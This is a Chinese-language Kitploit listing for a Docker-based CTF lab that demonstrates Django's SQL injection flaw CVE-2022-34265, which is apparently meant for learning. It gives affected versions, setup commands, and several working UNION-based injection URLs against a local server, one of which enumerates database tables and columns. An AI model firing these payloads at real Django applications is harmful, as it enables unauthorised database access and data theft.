Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CTF_Django_CVE-2022-34265 — 基于Docker的CTF挑战,演示Django的Trunc()和Extract()数据库函数中的SQL注入漏洞(CVE-2022-34265),并包含基于UNION的payload示例。 | Kitploit
工具/GitHubGitHub/lnwza0x0a/ctf_django_cve-2022-34265
漏洞分析Web应用程序漏洞利用CTF学习与教育数据库安全实验室与实践
GitHublnwza0x0a/ctf_django_cve-2022-34265

CTF_Django_CVE-2022-34265

基于Docker的CTF挑战,演示Django的Trunc()和Extract()数据库函数中的SQL注入漏洞(CVE-2022-34265),并包含基于UNION的payload示例。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
124年前尚未审核
分享

CTF_CVE-2022-34265

描述

在Django 3.2早于3.2.14以及4.0早于4.0.6的版本中发现了一个问题。如果未受信任的数据被用作kind/lookup_name值,Trunc()和Extract()数据库函数容易受到SQL注入攻击。将lookup_name和kind选择限制在已知安全列表内的应用程序不受影响。

使用方法

启动

root@kitploit:~
git clone https://github.com/coco0x0a/CTF_CVE-2022-34265
cd CVE-2022-34265
sudo docker-compose up -d

检查状态

root@kitploit:~
sudo docker ps

移除

root@kitploit:~
sudo docker-compose down

受影响版本

  • Django >= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

已修复版本

  • Django 3.2.14

  • Django 4.0.6

验证

环境

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

SQL注入

使用UNION

root@kitploit:~
http://127.0.0.1:8000/extract/?lookup_name=year%20FROM%20start_datetime))%20OR%201=1%20UNION%20SELECT%201--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, 2, 3, 4, 5, 6, 7--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT "TEST", now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT CONCAT(table_name, '~', column_name), now(), now(), now(), now(), now(), now() FROM information_schema.columns--

image

参考

https://github.com/aeyesec/CVE-2022-34265

https://github.com/ZhaoQi99/CVE-2022-34265

https://github.com/suksit/writeups/tree/main/secplayground/half-year-event-2022

下载工具